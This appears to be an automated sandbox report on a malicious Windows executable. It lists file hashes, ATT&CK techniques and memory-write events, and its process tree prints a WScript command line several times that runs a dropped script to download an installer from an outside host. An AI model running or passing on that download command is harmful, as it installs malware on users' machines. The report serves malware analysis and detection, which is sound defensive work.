b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19

General

Target

7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
Size

184KB
MD5

7541be9044f3a1d7ab258bb36f857a2e
SHA1

25b38a97fd748ef26874fa390f98597013ef102d
SHA256

b42dfb8edbed135a21427c868a0154aea5b04ae8cd7077fe078a297790ecbc19
SHA512

40343f0d547e57b4d26f776fd3a1bdf6b791f0ba0e26355968a4c899926cf89e320bc5dbcf72d88ccef5fa145beb099d6a9e4d17320c80ccfbd61c69ea4fbcda
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3+i:/7BSH8zUB+nGESaaRvoB7FJNndn2

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 6 IoCs

flow	pid	Process
15	4256	WScript.exe
36	4644	WScript.exe
40	4644	WScript.exe
52	2224	WScript.exe
54	4876	WScript.exe
57	4480	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1620 wrote to memory of 4256	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	92
PID 1620 wrote to memory of 4256	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	92
PID 1620 wrote to memory of 4256	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	92
PID 1620 wrote to memory of 4644	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	98
PID 1620 wrote to memory of 4644	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	98
PID 1620 wrote to memory of 4644	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	98
PID 1620 wrote to memory of 2224	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	102
PID 1620 wrote to memory of 2224	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	102
PID 1620 wrote to memory of 2224	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	102
PID 1620 wrote to memory of 4876	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	104
PID 1620 wrote to memory of 4876	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	104
PID 1620 wrote to memory of 4876	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	104
PID 1620 wrote to memory of 4480	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	105
PID 1620 wrote to memory of 4480	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	105
PID 1620 wrote to memory of 4480	1620	7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe	105

C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\7541be9044f3a1d7ab258bb36f857a2e_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1620
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
  2⤵
  - Blocklisted process makes network request
  PID:4256
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
  2⤵
  - Blocklisted process makes network request
  PID:4644
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
  2⤵
  - Blocklisted process makes network request
  PID:2224
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
  2⤵
  - Blocklisted process makes network request
  PID:4876
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufFF11.js" http://www.djapp.info/?domain=edRAVQlPjP.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufFF11.exe
  2⤵
  - Blocklisted process makes network request
  PID:4480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1792 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8
1⤵
PID:1236

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

JavaScript

1

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufFF11.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit

Analysis

Sharing